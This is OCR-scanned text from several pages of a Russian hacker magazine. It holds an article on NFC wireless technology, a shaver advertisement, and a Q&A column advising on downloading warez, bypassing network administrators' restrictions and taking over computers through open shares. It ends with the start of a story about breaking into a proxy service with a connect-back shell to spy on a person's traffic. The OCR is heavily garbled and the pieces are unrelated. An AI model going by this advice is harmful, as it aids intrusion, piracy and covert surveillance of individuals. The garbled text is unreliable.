ше не обращаешь внимание. За кадром оста- 




ется ещѳ дюжина подобных вроде ІІѴѴВ, 
2ідВее, по разным причинам не получивших 
широкого распространения (по крайней мере, 
пока). Новая разработка от двух гигантов ВоуаІ 
РИіІірз Еіесігопісз и Зопу Согрогаііоп наверняка 
осталась бы среди них, если бы не специфика 
ее использования. Имя технологии — радио- 
частотная связь ближнего действия или в ори- 
гинале Ыеаг Ріеіб Соттипісаііоп (ЫРС). Новин- 
ка работает на частоте 23,56 МГц и позволяет 
передавать данные на расстояние до 20 см со 
скоростью свыше 212 Кбит/с. Будет ли это му- 
зыка, видео или какая-то техническая инфор- 
мация — неважно. Основная фишка этой тех- 
нологии заключается в том, что она полностью 
совместима с существующими технологиями 
бесконтактного считывания смарт-карт форма- 
та РИіІірз Мііаге и Зопу РеІіСа. Это предоставля- 
ет массу новых возможностей, о которых мы 
сейчас и поговорим. 

[іоисіі апсі соппесі] Ну конечно же, первое, 
для чего может использоваться беспроводная 
связь, — это передача данных между различны- 
ми устройствами. Подобную возможность полу- 
чат любые девайсы, оснащенные ЫРС-модулем. 
Достаточно приблизить их на достаточное для 
соединения расстояние, и ты сразу же сможешь 
передавать музыку, обмениваться картинками 
или, например, синхронизировать адресную кни- 
гу. Здесь важно понять, что встроенными ЫРС- 
модулями будут оснащаться не только сотовые, 
КПК и прочий мобильный стафф, но и любые 
другие приборы. Передавать мелодии и картин- 
ки с сотового на сотовый — это, конечно, весело, 
но такая связь может понадобиться и, например, 
телевизору. Если оснастить его ЫРС-связью, то 
ты легко сможешь просматривать фотографии с 
цифровика. Не надо никаких шнуров и прочих 
соединительных приспособлений: просто пос- 
тавь фотоаппарат на телевизор и наслаждайся 
качественными фотками. К слову, прототип по- 
добного телевизора уже разработан Зопу и, воз- 
можно, скоро войдет в серийное производство. 
Опытные читатели, наверное, уже начали зада- 
ваться вопросом, почему производители обя- 
зательно будут использовать эту технологию? 
Есть две причины. Во-первых, это уже стандар- 
тизованная технология, которая получила 




закачать новую музыку на мобильный теле- 
фон? Не проблема, если оба устройства под- 
держивают ЫРС 



одобрение международной службы стандарти- 
зации (читай врезку). А во-вторых, ЫРС-модули 
намного дешевле в производстве, нежели по- 
любившиеся нам ВІиеІооІП-собратья. Цена од- 
ного экземпляра измеряется в центах (!), в то 
время как поддержка «синего зуба» для каж- 
дой модели телефона обходится никак не 
меньше нескольких долларов. Нужно ли пояс- 
нять, что І\ІРС, скорее всего, будут устанавли- 
вать в большинство девайсов? Думаю, нет. 
Более того, ЫРС вполне возможно использовать 
для улучшения работы уже существующих тех- 
нологий. Взять тот же ВІиеІооШ. Максимальная 
пропускная способность ВІиеІооШ составляет 
721 Кбит/с, у І\ІРС этот показатель практически в 
два раза ниже. Понимаешь? Если имеется воз- 
можность использовать «синий зуб», то предпоч- 
тение нужно отдать ему. И скорость быстрее, и 
радиус действия значительно шире. С другой 
стороны, устанавливать соединение через 
ВІиеІооШ довольно хлопотно: сначала нужно про- 
извести сканирования эфира, найти активные 
устройства, потом сделать запрос на подключе- 
ние, ввести коды авторизации (если таковые ис- 
пользуются) и лишь потом приступать к переда- 
че данных. Но! Если оба аппарата поддерживают 
технологию І\ІРС, то при соответствующей наст- 
ройке достаточно будет поднести их к друг к дру- 
гу — и ВІиеІооІН соединение установится без 
лишних вопросов. Практически мгновенно. 

[ІоисИ апсі до] Я уже говорил о том, что ЫРС 
полностью совместима с технологиями 
смарт-карт РИіІірз МІРАВЕ и Зопу РеІіса. По 
сути, в этом заключается главная изюминка 
технологии. Если ЫРС получит должное расп- 
ространение, то очень скоро ты сможешь ис- 
пользовать мобильник (КПК) вместо пропуска 
или электронного ключа. Помести его в об- 
ласть специального ЫРС-сканера — и иденти- 
фикация пройдена. Подобных подход навер- 
няка найдет применение на различных пропу- 
скных пунктах или местах проверки билетов 
(в транспорте, например, или метро (а метро 
не транспорт разве? — прим. ЬООЫік)), где 
пользователю ранее предлагалось ввести код 
или использовать проездной билет. 
Теоретически, ЫРС-устройства пригодны и для 
использования в качестве электронного ключа. 
Если в ЕЕРВОМ телефона залить специальные 
идентификационные данные, то с помощью те- 
лефона можно будет открывать двери в доме, 
офисе или машине. Владельцы элитных гости- 
ниц уже вовсю задумываются о подобном сер- 
висе. Ведь должно получиться неплохо: мо- 
бильные телефоны люди забывают намного 
реже, чем гостиничные ключи. Да и удобство 
использования не сравнить! 

[іоисИ апсі Ьиу] ЫРС как универсальное сред- 
ство оплаты? Отличная идея! Если в ЫРС-модуль 
удастся залить данные о кредитной карте или 
банковском счете, ты легко сможешь оплачи- 
вать любые услуги с помощью обычного мобиль- 
ного телефона. Поднес трубку к специальному 
ЫРС-сканеру, подключенному к электронному 
центру обработки транзакций, и нужная сумма 
сама спишется со счета. Система сильно напо- 
минает считыватели для пластиковых карт, кото- 
рые активно используются на автомобильных 



заправках и телефонах в самолете. При этом 
ЫРС обещает стать еще практичнее и удобнее. 
Наполеоновские планы по поводу этой техно- 
логии строят продавцы мобильного контента 
(мелодий, картинок и игр для сотовых телефо- 
нов). Возможности для них открываются воис- 
тину впечатляющие. Теперь с помощью обору- 
дованных ЫРС-связью рекламных щитов, они 
смогут в интерактивном режиме продавать 
контент любому желающему. Любой человек 
сможет быстро изучить ассортимент и купить 
заинтересовавшую его феньку, дотронувшись 
телефоном до ее названия. Продавцы убивают 
сразу трех зайцев: наглядно рекламируют то- 
вар, обеспечивают предельную простоту по- 
купки и реализуют мгновенную доставку това- 
ра посредством передачи данных через ЫРС. 
Похожие системы разрабатываются и для мно- 
гих других товаров. Например, некоторые ком- 
пании анонсировали выпуск сервиса по прода- 
же концертных билетов. Цель разработчиков 
ЫРС заключается в организации повсеместной 
инфраструктуры ЫРС-совместимых устройств, 
которая охватила бы все аспекты современной 
жизни. И что-то мне подсказывает, что своей 
цели они добьются любой ценой. 



[пару слов о технической стороне ЫРС] 

По большому счету, новинка очень схожа со 
всеми остальными технологиями беспроводной 
связи, однако некоторые отличия все-таки есть. 
Начнем с того, что соединение между ЫРС-уст- 
ройствами осуществляется исключительно нап- 
рямую, то есть используется принцип реагЧо- 
реаг. В отличие от ВІиеІооІИ и ѴѴі-Рі, где активно 
применяются точки доступа, в ЫРС возможен 
только один вариант организации соединения 
— «клиент-сервер». Иначе говоря, одновремен- 
но в соединении участвуют только два устрой- 
ства. Это связано, во-первых, с ограниченным 
радиусом действия подобных устройств (не за- 
бывай, что это технология радиосвязи ближне- 
го действия), а во-вторых, с необходимостью 
обеспечения безопасности подключений и кон- 
фиденциальности передаваемых данных. 
Рабочая частота — 23,56 МГц — выбрана не 
случайно. Она не нуж- 
дается в обязательном 
лицензировании и по- 
этому может быть ис- 
пользована без риска 
получить по голове от 
ГосСвязьНадзора. Ко- 
нечно, законодатель- 
ство некоторых стран 
может накладывать не- 
которые ограничения, 
но это маловероятно. 

І\ІРС-девайсы создают 
настолько ничтожные 
помехи для других ра- 




универсальный ЫРС- 
адаптер, которым 
очень скоро будут ос- 
нащены турникеты в 
общественном транс- 
порте некоторых го- 
родков Германии 







оснащенные ЫРС-адаптером ТВ смогут легко 
считывать фотографии с цифровиков и сразу 
отображать их на экране 
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цена ІЧРС-модулей 
составляет всего 
несколько десятков 
центов. Аналогичный 
показатель у 
ВІиеІооІГі на несколь- 
ко порядков выше... 



совместная разра- 
ботка Ѵіза и РЫІірз. 
Теперь ты сможешь 
использовать мо- 
бильный телефон 
или КПК как пласти- 
ковую карту 



Ііоп). В зависимости от ситуации любое устрой- 
ство может выполнять как одни, так и другие 
функции. Подобное разделение ролей было реа- 
лизовано не забавы ради, а для того чтобы разг- 
раничить обязанности каждой из участвующих в 
соединении сторон. ІпШаІог всегда выполняет 
функции координатора: управляет частотной и 
пакетной синхронизацией, следит за связью, 
уровнем сигнала и т.п. Задачи принимающей 
стороны существенно проще: она лишь отвечает 
на запросы соединения. Стоит сказать, что уст- 
ройства могут работать в активном (Асйѵе тобе) 
или же пассивном (Раззіѵе тобе) режиме. Раз- 
ница в том, что в активном режиме оба девайса 
генерируют свое электромагнитное поле и ис- 
пользуют его для передачи данных. В пассивном 
режиме поле генерирует только одно из уст- 
ройств, но зато другим устройством использует- 
ся особый метод модуляции сигнала. В протоко- 
ле также прописано, что устройство, инициирую- 
щее подключение, всегда должно работать в ак- 
тивном режиме, то есть генерировать свое 
электромагнитное поле. И это вполне логично. 
Когда два объекта со встроенными микросхе- 
мами поддержки ЫРС оказываются поблизости 
(максимальная дистанция 20 см), они распоз- 
нают друг друга и организуют соединение, в хо- 
де которого возможен обмен данными на ско- 
рости 106 Кбит/с, 212 Кбит/с или 424 Кбит/с. 
Спецификация ІМРСІР-1 (Ыеаг РіеІсІ Соттипісаііоп) 
предусматривает различные методы модуля- 
ции сигнала и кодирования данных для разных 
скоростей. ЫРС постоянно отслеживает состоя- 
ние канала и подстра- 



диоустройства, что их можно не брать в расчет. 
Рабочая частота, как и многие другие аспекты 
работы протокола ЫРС, были переняты у дру- 
гой известной технологии — ВРЮ (радиочас- 
тотная идентификация). Последняя получила 
широкое распространение на различных скла- 
дах и производстве, где нужно постоянно иден- 
тифицировать полученный груз, прибывшие 
машины и т.п. На каждый объект наклеивается 
специальный миниатюрный передатчик, кото- 
рый на регулярной основе передает в эфир не- 
кий идентификационный код. В нужных местах 
расставляются специальные сканеры, которые 
«слушают» частоту 23,56 МГц (знакомая циф- 
ра?), и поэтому легко считывают идентифика- 
ционный код с передатчиков и таким образом 
идентифицируют объекты. 

Подобно многим другим девайсам, работаю- 
щим в радиочастотном диапазоне, ІМРС-соеди- 
нение является полудуплексным. Вспомни: для 
того чтобы сказать что-то по рации, приходится 
зажимать специальную кнопку. Тебя слышно 
только тогда, когда эта кнопка нажата, зато, 
отпуская кнопку, ты можешь услышать своего 
собеседника. Это и называется режимом «по- 
лудуплекса». В плоскости І\ІРС это выглядит 
так: перед передачей данных ЫРС-устройство 
должно просканировать эфир, и, лишь убедив- 
шись в том, что ни одно другое устройство не 
активно, приступать к передаче сигнала. 
Протокол ЫРС дифференцирует устройства на 
те, которые инициируют подключение (Іпіііаіог) и 
те, что принимают его (Тагдеі оі Ше соттипіса- 



БУДУЩЕЕ? НЕТ, УЖЕ НАСТОЯЩЕЕ! 

В самом начале развитии технологии для Золу и РМіІірз было 
важно стандартизировать технологию и сделать ее доступной 
другим производителям. А как иначе? Ведь в противном случае 
на массовое распространение технологии можно не надеяться, 
а это фактически является провалом всей задумки в целом. 
Радиочастотная связь ближнего действия по определению 
должна быть максимально распространенной, иначе для конеч- 
ного потребителя это будет не более чем еще один пункт в 
списке поддерживаемых возможностей. В декабре 2003 года 
производителям это сделать удалось: технология стала между- 
народным стандартом. Спецификация ІЧеаг РіеІсІ Соттипісаііоп 
(ЫРСІР-1) получила одобрение организации ІЗО и Международ- 
ной Электротехнической Комиссии (ІЕС). РІовый стандарт был 
обозначен ІЗО/ІЕС 13 18092 и фактически представлял собой 
симбиоз двух технологий: ІШаге (РМШрз) и РеІіСа (Золу). 

Ріа базе заводов РМіІірз было организовано производство инже- 
нерных образцов коммуникационного чипа для ЫРС. Планиро- 
валось, что чипы пойдут в коммерческую эксплуатацию во вто- 
рой половине 2004 года. И не обманули. Ріа выставке высоких 
технологий в Монако была представлена сменная панель для 
Ыокіа 3220, в которую интегрирована технология связи в ближ- 
нем электростатическом поле (ЫРС, ІЧеаг-РіеІсІ Соттипісаііопз). 
В панель для Ыокіа 3220 интегрирован ЫРС-чип РИіІірз, содер- 
жащий 8-разрядный Заѵа-микроконтроллер смарт-карт ЗплагМХ 
с 72 Кб перезаписываемой постоянной памяти (ЕЕРВОМ). Са- 
мое главное: такие телефон и панель можно купить уже сейчас! 



ивается под конкрет- 
ные условия среды. 
Если эфир сильно за- 
шумлен, разумение ис- 
пользовать меньшую 
скорость и большее ко- 
личество избыточных 
данных для возмож- 
ности коррекции оши- 
бок. Если помехи в 
эфире незначительны, 




просто поднеси сотовый к своему компьютеру и нужные данные, вроде но- 
вой ^ѵа-игры, быстро начнут закачивать на внутреннюю память телефона 



значит, ЫРС-устройства вполне могут работать 
на самой высокой скорости, по крайней мере, 
до тех пор, пока условия в эфире не изменят- 
ся. Выбор скорости и метод модуляции выби- 
рает устройство, которое инициирует подклю- 
чение. После этого в эфир передается опреде- 
ленный набор символов, которые легко анали- 
зируются и позволяют принимающей стороне 
настроиться на ту же скорость и модуляцию. 

[заключение] Перспективы ЫРС очевидны. 
Соответствующие модули значительно упро- 
щают процедуру идентификации объектов, об- 
мен данными и процесс оплаты товаров и ус- 
луг. Их можно встраивать в мобильные теле- 
фоны, цифровые фотоаппараты, карманные и 
обычные компьютеры, любую бытовую техни- 
ку и т.п. При этом стоимость интеграции ЫРС 
будет на несколько порядков ниже, чем того 
же ВІиеЮоІИ. Разработчики с завидной уверен- 
ностью утверждают, что технология получит 
бурное развитие в самые ближайшие годы, и 
уже к 2008 году более 35% всех мобильных те- 
лефонов будут ее поддерживать. В доказа- 
тельство моих слов можно привести тот факт, 
что такие гиганты, как ІМокіа, Затзипд и 
Моіогоіа уже присоединились к ЫРС Рогит (ор- 
ганизации которая сначала стандартизирова- 
ла новую технологию, а теперь занимается ее 
продвижением на рынок). А немецкая транспо- 
ртная компания РІМѴ собирается уже в начале 
следующего года применить ЫРС новинку на 
своих автобусных маршрутах в г.Ханау (приго- 
род Франкфурта) © 




сделав из мобильника универсальный коше- 
лек, производителям еще долго придется ло- 
мать голову над новыми изобретениями :) 









Товар сертифицирован 



Создай свой стиль 



У Майкла это есть, и Кристин это нравится. 
Борода снова в моде! Но, поверь, девчонки 
не в восторге от беспорядочной 



растительности на лице. Здесь важен стиль. Обычная борода плюс твое воображение, и ты станешь другим 
человеком. Все что тебе надо - подходящая идея и инструмент, чтобы ее осуществить. 




Главное - суперидеи! 

Не стоит пренебрегать «эспаньолкой» - небольшой остроконечной бородкой. 
Совсем короткая или чуть длиннее, она всегда выглядит прикольно. 

Если хочешь порадовать подружку, просто оставь небольшой участок волос 
на выбритой коже под нижней губой - «заплатку для души». Смотрится очень 
аппетитно. Может, добавить бородку или усы? Приветствуются самые смелые 
идеи. Только учти, что любая растительность на твоем лице должна иметь четкие 
контуры. 

Семидесятые возвращаются! Бакенбарды дают большой простор для фантазии. 
Короткие и узкие, длинные и широкие, вертикальные или горизонтальные, 
треугольной или прямоугольной формы - они открывают безграничные 
возможности для создания собственного стиля. Удлини их до подбородка, 
и они плавно перейдут в бороду. 

«Баки» зрительно сужают круглое лицо, а трехдневная щетина придает реально 
мужественный вид. «Эспаньолка» и «заплатка» акцентируют внимание на 
подбородке и идут тем, у кого овальное лицо. 

Совет: Если хочешь, чтобы растительность на лице выглядела круто, не забудь 
о симметрии. Ориентируйся на свои черты лица: губы, уголки рта, нос, уши, 
скулы - это отправные точки для создания стиля бороды. За идеями и другими 
полезными советами зайди на шѵѵ.Ьгаип.ги 

Как бриться? 

Создавать свой собственный стиль лучше всего с помощью электробритвы 
со съемной насадкой-триммером, чтобы пена не мешала процессу. Прежде чем 
приступить, убедись, что твоя кожа сухая и чистая. 

Сначала используй бритву с четырехуровневой насадкой-триммером для 
подравнивания бороды, чтобы достичь необходимой длины волосков. Затем, сняв 




Если хочешь узнать больше о стильном бритье, зайди на ХЛЛ/ѴѴѴ.ЬгаіІП.ГІІ 



насадку, сделай четкий контур бреющей сеткой электробритвы. После чего сбрей 
все лишнее. Всегда держи бритву под прямым углом к коже. Ополосни лицо водой. 
Готово! 

Бритва «три в одном» - стиль без ограничений 

Бритва, стайлер и триммер в одном - это Вгаші сш2ег 3 . Фишка в том, что бритва 
оборудована двусторонним вращающимся триммером. На обоих его концах 
имеются ножи: узкий - для четких прямых линий и сложных контуров, широкий - 
для равномерного подравнивания более крупных участков. Плюс сш2ег 3 оснащен 
четырехуровневой насадкой-триммером для поддержания желаемой длины 
бороды. С сш2ег 3 также возможно влажное бритье. Никакой душ не помешает 
этому суперустройству добраться до каждого волоска. С этой бритвой даже такой 
лентяй, как Майкл, будет выглядеть стильно. 

Ну, а если в результате ты окажешься «слегка волосатым» - наши поздравления! 
Либо ты создал новый стиль, либо попробуй еще раз. С сш2ег 3 неудачная попытка 
превратится в новый шедевр всего за одно мгновение. Если опять неудача - 
не отчаивайся! Щетина отрастет через пару дней, и ты снова можешь заняться 
созданием нового стиля. 

Создай свой стиль. 
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О: Занимаюсь разработкой одной фирмы, которая имеет нес- 
колько локалок в разных уголках страны. Половину из них уже 
взял под контроль, но очень хочу рулить ими, как одним целом, 
чтоб не геморроиться, переключаясь с одной на другую. 

А: У начинающих админов (пусть и не нанятых, но незаметных и уда- 
ленных :)) существует один общий недуг — очень тяжело следить за 
сложной распределенной системой. На самом деле, современные 
средства в некотором смысле стирают расстояния и позволяют уда- 
ленно админить несколько локалок с таким же успехом, что и одну 
местную. Главное знать о нужных средствах вроде описанной в этом 
же номере Х-тулзе КаЬоосІІе ( тт.каЬоосІІе.огд ). Программа, после 
установки серверной части по разным сетям, позволяет собрать во- 
едино все разбросанные там машинки. Тебе не нужно тыкаться по 
разным сеткам, открывать новые окна — просто возникает стройное 
дерево из всего доступного ІТ-добра. Есть как ипіх, так и ѵѵіп-клоны: 
сети любой конфигурации попадают под чуткий контроль. Учитывая 
бесплатный софт, не сложно догадаться об ограниченных возмож- 
ностях удаленного администрирования: прикольных радостей а-Іа 
старинный ЫеШиз здесь не держат. 

О: Уже третью неделю не могу докачать редкий варез из Р2Р; 
ІВС не дает слить, так как у меня канал узкий (диалап). 

Где еще можно добыть эту редкостную вкусняшку? 

А: Стандартный ответ на вопрос «Где?» — в п...е, то есть по- 
исковике :). Разумно попробовать тот же самый Гугл, пос- 
кольку все еще встречаются сердобольные кадры, которые 
выкладывают варез на ѵѵеЬ. Также помогают и специализи- 
рованные РТР-искалки а-Іа и/и/и /.ШезеагсЬ.ги, где порой выс- 
какивают серверы НИИ, на халявном пространстве которых 
можно найти все вплоть до секретных чертежей ЫАЗА. Пос- 
леднее же время, когда в Р2Р стали активно охотиться на 
ведьм, я переметнулся к более старому местечку — пеѵѵз- 
группам. Примерами могут быть пеш://пеѵѵ8.дідапеш.сот/ 
аІі.2600.ѵѵагеі, пе ѵѵз://пеѵѵз .дідапеѵѵз . сот/аІі.Ьіпагіез , которые 
можно найти на большей части пеѵѵз-серверов. Спроси свое- 
го ІЗР о возможности использования такого сервиса (шаблон — 
пеѵѵз.ІЗРпате.ги). Бесплатные и общедоступные серверы ра- 
зыскиваются все тем же Ѳоодіе'ом (олигархи, кому не жаль 
7 — 20 баксов ежемесячно, идут на и /ѵѵѵѵ.ргетіит-пеѵѵз.сот). 
Единственной проблемой может показаться необходимость 
тянуть все добро по кусочкам, когда ты начинаешь маши- 
нально открывать несколько сот постов, сохраняя аттачи, 
собирать всю кучу воедино. Избежать всего этого помогают 
пеѵѵз-ІеесИег'ы, проги для поиска и скачки контента с пеѵѵз- 
сервантов. Добротный пример, который стабильно снабжал 
материалом закрытую ныне рубрику І_еесН, — Ые\л/зІ_еесНег 
(и/и/и/. пешІеесЬег.сот) . 



БУДЬ КОНКРЕТНЫМ И ЗАДАВАЙ КОНКРЕТ- 
НЫЕ ВОПРОСЫ! СТАРАЙСЯ ОФОРМИТЬ 
СВОЮ ПРОБЛЕМУ МАКСИМАЛЬНО ДЕТАЛЬ- 
НО ПЕРЕД ПОСЫЛКОЙ В НАСК-РАО. ТОЛЬКО 
ТАК Я СМОГУ ДЕЙСТВИТЕЛЬНО ПОМОЧЬ 
ТЕБЕ С ОТВЕТОМ, УКАЗАТЬ НА ВОЗ- 
МОЖНЫЕ ОШИБКИ. ОСТЕРЕГАЙСЯ ОБ- 
ЩИХ ВОПРОСОВ, ВРОДЕ «КАК ВЗЛО- 
МАТЬ ИНТЕРНЕТ?», ТЫ ТОЛЬКО ПОТРА- 
ТИШЬ ПОЧТОВЫЙ ТРАФИК. ТРЯСТИ ИЗ 
МЕНЯ ФРИШКИ (ИНЕТ, ШЕЛЛЫ, КАРТЫ) 

— НЕ СТОИТ, Я САМ ЖИВУ НА ГУМАНИ- 
ТАРНУЮ ПОМОЩЬ. 



ННСК- РПО еОГПГПЁМТЬ: 

ЗісІеХ 

НасІс-ГаоНпссі1.нсіІсао.пи 

.... ШШГП' 






О: На ІІзепеІ не смог найти, что искал. Расскажи, 
а нет какого-то способа упростить скачку вареза 
с ІВС, чтобы не запоминать синтаксис всех нуж- 
ных команд? 

А: На самом деле, не так уж и много команд. Есть 
лишь незамысловатое /сіср піск-Ьоі'а хдсс зепсі 
#расКа. Так ты запрашиваешь любой приглянув- 
шийся пак без каких-либо дополнительных позна- 
ний. Не ради команд, но для автоматизации поис- 
ка и запросов добра, направлю твой взор на реше- 
ние под названием ХОСС-РеІсІі (хбссІеІсН.зоигсе- 
Іогде.пеі), которое доступно для ѴѴіпсІоѵѵз и ІІпіх. 
Единственным условием становится наличие инте- 
рпретатора языка ВиЬу, который весит 12М (линк 
есть на сайте софтины). Боты, как и любовь, име- 
ют свойство уходить и возвращаться, так что для 
добычи необходимого бывает полезно мониторить 
запрашиваемые файлы, теребить приходящих и 
возвращающихся ботов о распространяемом ими 
хозяйстве. В надвигающейся версии обещают 
добавить возможность сортировки результа- 
тов поиска по загруженности ботов, так что 
ты будешь знать, где самая ко- 
роткая очередь за варезкой. 

О: На некоторые из моих подконт- 
рольных ѵѵеЬ-серверов нападают 
хакерюги со своими йсІоЗ-атаками 
и прочей шнягой. Можно ли как-то 
мониторить, наблюдать, какую из 
машин они пытались завалить? 

А: С твоими сервантами может 
случиться что угодно — лишить 
машины жизни могут не только 
гнусные хакеры. В любом случае 
нужно всегда вовремя замечать 
неполадки в твоей сети. Здесь можно просто пинго- 
вать все адреса, перебирая один за другим в надеж- 
де не заметить изменяющегося отклика. Однако в 
подобном допотопном способе есть и слабая сторо- 
на, ведь здесь не будет понятно, когда отклик меня- 
ется с повышением нагрузки, а когда это пакетный 
шторм. Более чутким средством кажутся все воз- 
можные программные системы мониторинга. 
ѴѴеЬѴѴаІсІіВоІ ( уѵуѵуѵ. ехсІатаііопзоП. сот/ ѵѵеЬѵѵаісІі- 
Ьоі) может стать неплохим тому примером. Здесь 
можно задавать промежутки, когда все хозяйство 
будет проверяться. Результаты опросов могут отсы- 
латься на мыло или другие средства связи, чтобы 
оповестить тебя о надвигающихся сложностях и на- 
добности предпринять радикальные меры. 

О: Меня доканал АѴР. У меня имеется аж 3600 дан- 
ных в системе, все проверить разом — гемор, я ос- 
тавляю антивирусные рейды на ночь. Однако эта 
зараза находит архив с паролем и зависает, ожи- 
дая ответа. Можно как-то обучить образину? 

А: К сожалению, в настройках Касперского я так 
и не нашел возможности отключить проверку за- 
пароленных архивов. Самым простым решением 
показалось — дождаться первого диалога по те- 
ме архивов и дать АѴ в глаз аргументом — «Де- 
лать то же самое и далее». Теперь прога будет 
пропускать все секретные темы архивов. 

О: Работаю в сетке, где запрещено все и вся, да- 
же снести их систему не получается. Можно ли 
мне как-то все же загрузить туда свою операци- 
онку по-ягодичному хитро? :) 

А: Главное, чтобы после загруза не пострадали твои 
собственные ягодицы :). Для верности направлю те- 
бя к дискпаймеру наверху, который просит форму- 
лировать проблему максимально точно. Иначе мне 
придется сформулировать ее за тебя и сказать, что 
несмотря на ограничения системы, загрузка с СО 
остается возможной. Следуя подобному предполо- 
жению, я предложу установить фриварную систему 



ВаП'з РЕ Виіісіег ( тт.пи2.пи/реЬиіІсІег ). С ее по- 
мощью ты можешь создать полноценный загрузоч- 
ный диск, где будет работать винда без привычной 
установки на винт. Понятно, что будут иметь место 
некоторые ограничения вроде работы с разрешени- 
ем 800X600 и небогатыми настройками сети. Одна- 
ко доступ к ней будет полноценным, так что ты, ве- 
роятно, сможешь проделать то, что было запреще- 
но админами прежде. На будущее: не стесняйся — 
пиши о себе и своих проблемах во всех деталях. 

О: Я часто занимаюсь захватом компов через 
раскрытые шары. Можно ли будет эту тему про- 
должать крутить из-под Мака? 

А: Меня часто спрашивают о возможности сканирова- 
ния шаров из-под ипіх. С подобными решениями по 
теме Мака я еще не сталкивался, но уже знаю навер- 
няка, что ты сможешь цеплять сюда любые виндоз- 
ные шары. Здесь поможет простое средство для 
просмотра локальных и сетевых РАТ/ІЧТРЗ-дисков — 
МасБгіѵе ( ѵѵѵт.тесііаіоиг.сот ). Когда же требуется 
профессиональный подход административного уров- 
ня, на помощь придет отдельный 8МВ Мападег 
(' шш.ІаЬо-аррІе.сот ). Эта связка поможет разрешить 
вопрос до появления полноценного сканнера шаров. 

О: В чем заключается Ігогеп мод, который может 
быть приписан к моему ІВС каналу? 

А: Подобный наговор известен в ряде сервисных 
сетей, где опция блокирует административный (или 
полный — для всех посетителей) доступ к каналу на 
определенный срок (30, 60 и более дней в зависи- 
мости от сети и ее полней). Получается, что офици- 
ально канал все еще принадлежит его законным 
хозяевам, которые остаются при законных статусах 
операторов. Ограниченными оказываются лишь их 
действия по настройке канала, который фактичес- 
ки оказывается переведен «во временное пользо- 
вание» администрации сети. Обыкновенно подоб- 
ный мод ставится, когда объявилась проблема с ка- 
налом, пришел убедительный аЬизе, админам тре- 
буется дополнительное время на выяснение вопро- 
са и обстоятельств. Когда действие колдовства 
Ігогеп закончится, можно будет вернуться к полно- 
ценной работе с каналом или же он будет заблоки- 
рован на совсем. Мод выдается не роботами, но 
живыми иркопами (сервер-опами — чаще), у ко- 
торых следует настоятельно выяснить длитель- 
ность действия {гогеп'а. Так с горемычным кана- 
лом #хакер @ОАІ_пеІ случилось, что он оказался 
не зарегистрирован после прекращения действия 
темы (30 дней). Будь готов запустить несколько 
десятков ботов на регистрацию этого канала (бли- 
же к окончанию действия мода), чтобы другой хит- 
рец не опередил, не зарегал вместо тебя тему. 

О: Правда, что теперь вирусы будут называться оди- 
наково в БД разных производителей антивирусов? 

А: Меня зовут Иван, в Америке называли бы Джо- 
ном, во Франции, должно быть, Жаном. Как ни на- 
зывай — суть не меняется :). Однако в случае с ви- 
русами все не так, доходит до абсурда, когда в но- 
востях читаешь о появлении десятка новых смер- 
тоносных вирей за день. Твое сердце поразят не 
разбушевавшиеся вирмейкеры, но неразумные 
программеры, которым недостает единого виде- 
ния имен заразы. Одному и тому же, долго не за- 
думываясь, они дадут добрый десяток имен. Те- 
перь их разгильдяйству собираются положить 
большой и толстый конец, кладкой которого будет 
заниматься Сотгтюп Маіѵѵаге Епитегаііоп (СМЕ), 
основанное великими усилиями ІІпіІесІ Зіаіез 
Сотриіег Етегдепсу Веасііпезз Теат (118-СЕПТ). 
Эта контора будет присваивать имена наиболее 
опасной заразе, которые будут рассылаться по 
держателям БД. Здесь видится разумный расчет 
уменьшить путаницу во всем непростом деле. 



[ХАКЕР 11 [83] 05 > ВЗЛОМ 051 ] 



Паленые прокси 



ИНОГДА БЫВАЕТ НЕОБХОДИМО ПОСЛЕДИТЬ ЗА ЧЕЛОВЕКОМ. УЗНАТЬ, КАКИЕ САЙТЫ ОН ПОСЕЩАЕТ, С 
КЕМ ВЕДЕТ ПЕРЕПИСКУ, НА КАКИХ ФОРУМАХ ОБЩАЕТСЯ, О ЧЕМ ТРЕПЕТСЯ В ІСО И КАКОЙ ЕГО ПА- 
РОЛЬ К ТАИНСТВЕННОМУ ѴѴЕВ-РЕСУРСУ. ДЛЯ ЭТОГО СОВСЕМ НЕОБЯЗАТЕЛЬНО ПРОСЛУШИВАТЬ ТЕ- 
ЛЕФОН ИЛИ СТАВИТЬ ВИДЕОКАМЕРЫ В КВАРТИРЕ. ДОСТАТОЧНО ЛИШЬ ОТСНИФАТЬ ЕГО ТРАФИК. 
ОБЫЧНО ПОДОБРАТЬСЯ К МАРШРУТИЗАТОРУ ЖЕРТВЫ НЕВОЗМОЖНО. ОДНАКО ДОВОЛЬНО ЧАСТО 
ОБЪЕКТЫ СЛЕЖКИ ДЛЯ АНОНИМНОСТИ ПОЛЬЗУЮТСЯ РАЗЛИЧНЫМИ СЕТЕВЫМИ СЕРВИСАМИ, КОТО- 
РЫЕ ЕДВА ЛИ ДОБАВЛЯЮТ БЕЗОПАСНОСТИ I Мазіег-іате-тазіег 



Взлом ргоху-сервиса для прослушки 
неприятельского трафика 

[печальная преамбула] Как-то давно я искал хороший прокси- 
сервис. Теряясь в догадках, я серфил много интересных сайтов, читал 
форумы и отзывы клиентов. И вот мой браузер занесло на сайт 
ргоху4уои.пеі. На этом интересном проекте предлагалось купить 
проксики по довольно низкой цене. И я, быть может, даже и купил, 
если бы не увидел ссылку на форум рНрВВ 2.0.6. Учитывая то, что си- 
туация происходила где-то с полгода назад, я совсем не удивился :). 
Бережно выполняя одну команду за другой, я по обкатанному сцена- 
рию залил на сервер соппЬаск-шелл и вошел в систему. Вот только 
продержаться мне там не удалось. В этот день я толком ничего не по- 
смотрел, а на следующий обнаружил пропажу не только шелла, но и 
всего форума :). Видимо, админ каким-то образом обнаружил взлом 
и снес борду. Про этот «минивзлом» я никогда бы не написал в жур- 
нал, если бы не продолжение истории, случившейся недавно. 



[охота на уток] В один чудный вечер я сидел дома и не знал, чем бы 
себя занять. Мой хороший знакомый, с которым мы давно перетираем 
«заказные» спецзадания, поделился со мной одной интересной инфор- 
мацией. Он очень давно охотился за человеком, который промышлял 
не совсем честными делами. Не могу утверждать, но, по-моему, злоб- 
ный чувак просто кинул моего приятеля, что и побудило последнего 
преследовать сетевого негодяя, желая вернуть свои деньги. На одном 
из форумов, где мой 
кореш скорефанился 
с местной администра- 
цией, ему удалось за- 
палить ІР-адрес него- 
дяя. Судя по всему, ай- 
пишник принадлежал 
какому-то хостингу — 
на это указывал вывод 
ѵѵііоіз'а, который мне 
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Опция, аналогичная пара- 
метру -Т В КОНСОЛЬНОМ 55 / 7 , 
имеется и в РиТТУ. Зайди 
